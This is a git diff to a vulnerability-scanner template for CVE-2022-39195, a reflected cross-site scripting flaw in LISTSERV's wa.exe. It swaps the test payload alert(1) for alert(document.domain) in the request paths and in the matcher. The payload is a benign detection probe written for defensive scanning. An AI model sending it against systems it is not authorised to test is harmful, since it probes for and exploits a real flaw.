diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml
index 32e557875e..7475bf72b9 100644
--- a/cves/2022/CVE-2022-39195.yaml
+++ b/cves/2022/CVE-2022-39195.yaml
@@ -19,15 +19,15 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E"
-      - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E"
+      - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
+      - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(1)</script>"
+          - "<script>alert(document.domain)</script>"
           - "LISTSERV"
         condition: and
         case-insensitive: true